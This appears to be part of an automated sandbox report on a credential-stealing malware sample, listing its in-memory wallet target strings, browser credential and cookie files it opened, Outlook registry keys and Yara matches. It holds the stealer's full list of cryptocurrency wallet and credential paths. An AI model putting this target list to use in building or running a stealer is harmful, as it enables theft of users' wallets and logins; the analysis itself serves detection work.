Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sers\user\AppData\Roaming\\Electrum-LTC\wallets\\*.*
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                                Source: Yara matchFile source: 3.2.cmd.exe.5e100c8.8.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.2.cmd.exe.5a000c8.7.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.2.cmd.exe.5a000c8.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 25.2.MSBuild.exe.1100000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.cmd.exe.5e100c8.8.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000003.00000002.2055548397.0000000005E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000011.00000002.2204859505.0000000005A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000019.00000002.2204440453.0000000001102000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: u42w.0.exe PID: 1720, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5424, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7904, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7672, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\cqecfsbe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg, type: DROPPED

                                Remote Access Functionality

                                barindex
                                Source: Yara matchFile source: 1.3.u42w.0.exe.2f00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.u42w.0.exe.2ed0e67.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.u42w.0.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.u42w.0.exe.2f00000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.u42w.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000001.00000003.1714056198.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4640000.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4860000.13.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4640000.7.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4860000.13.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b0432f.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7c4dad.8.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1add525.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b28739.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7b47a3.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7a537d.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.1978341064.00000173EE71B000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
                                Source: Yara matchFile source: 3.2.cmd.exe.5e100c8.8.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.2.cmd.exe.5a000c8.7.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.2.cmd.exe.5a000c8.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 25.2.MSBuild.exe.1100000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.cmd.exe.5e100c8.8.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000003.00000002.2055548397.0000000005E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000011.00000002.2204859505.0000000005A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000019.00000002.2204440453.0000000001102000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5424, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7904, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7672, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\cqecfsbe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg, type: DROPPED
                                Source: Yara matchFile source: 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: u42w.0.exe PID: 1720, type: MEMORYSTR
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: 1.3.u42w.0.exe.2f00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.u42w.0.exe.2ed0e67.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.u42w.0.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.u42w.0.exe.2f00000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.u42w.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000001.00000003.1714056198.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: u42w.0.exe PID: 1720, type: MEMORYSTR
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b0432f.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7c4dad.8.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1add525.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b28739.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7b47a3.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7a537d.1.raw.unpack, type: UNPACKEDPE
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6CA20C40 sqlite3_bind_zeroblob,1_2_6CA20C40
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6CA20D60 sqlite3_bind_parameter_name,1_2_6CA20D60
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C948EA0 sqlite3_clear_bindings,1_2_6C948EA0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6CA20B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,1_2_6CA20B40
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C946410 bind,WSAGetLastError,1_2_6C946410
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9460B0 listen,WSAGetLastError,1_2_6C9460B0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C94C030 sqlite3_bind_parameter_count,1_2_6C94C030
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C94C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,1_2_6C94C050
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C946070 PR_Listen,1_2_6C946070
